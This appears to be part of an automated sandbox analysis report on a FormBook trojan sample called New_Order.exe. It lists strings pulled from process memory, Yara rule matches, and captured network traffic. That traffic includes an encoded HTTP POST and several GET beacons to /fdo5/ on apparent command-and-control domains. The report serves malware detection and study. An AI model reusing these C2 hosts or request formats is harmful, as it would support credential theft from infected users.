            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4168479789.0000000004CF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kasegitai.tokyo
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4168479789.0000000004CF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kasegitai.tokyo/fdo5/
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wextract.exe, 00000013.00000002.4167723777.0000000006060000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005BAA000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.000000000303A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:400
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wextract.exe, 00000013.00000002.4165061927.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: wextract.exe, 00000013.00000003.2036325732.0000000007D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000576/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/
            Source: unknownHTTP traffic detected: POST /fdo5/ HTTP/1.1Host: www.quote2bill.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.quote2bill.comReferer: http://www.quote2bill.com/fdo5/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 187User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 35 34 30 48 32 78 3d 4a 43 62 6c 6e 78 70 68 31 6f 52 71 52 76 56 50 7a 41 63 73 4a 6c 4b 43 70 41 42 31 56 55 64 75 74 56 45 46 59 46 75 43 6d 56 62 77 4c 74 70 37 74 68 75 6c 41 6b 55 71 31 75 63 38 4e 32 55 6c 4e 4f 46 55 78 4b 47 49 56 37 34 30 32 41 73 52 77 30 6d 56 50 70 73 67 6e 4f 73 5a 6c 52 41 5a 73 31 36 34 7a 31 79 66 72 4d 4f 76 30 53 53 32 52 66 76 41 59 66 4b 68 6a 36 79 30 4f 74 2b 64 4b 42 2b 59 4b 74 52 64 45 50 61 73 39 73 63 64 37 4a 43 49 2b 79 4d 35 66 35 5a 5a 59 57 32 4a 77 66 46 4c 65 44 42 43 42 76 54 49 6e 70 50 6a 54 41 3d 3d Data Ascii: 540H2x=JCblnxph1oRqRvVPzAcsJlKCpAB1VUdutVEFYFuCmVbwLtp7thulAkUq1uc8N2UlNOFUxKGIV7402AsRw0mVPpsgnOsZlRAZs164z1yfrMOv0SS2RfvAYfKhj6y0Ot+dKB+YKtRdEPas9scd7JCI+yM5f5ZZYW2JwfFLeDBCBvTInpPjTA==
            Source: unknownDNS traffic detected: queries for: www.rssnewscast.com
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w== HTTP/1.1Host: www.rssnewscast.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw== HTTP/1.1Host: www.quote2bill.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg== HTTP/1.1Host: www.fdissolutions.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.pay4dance.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ== HTTP/1.1Host: www.busan3-200.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.wrautomotive.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.poria.linkAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg== HTTP/1.1Host: www.kasegitai.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: New_Order.exe
            Source: New_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
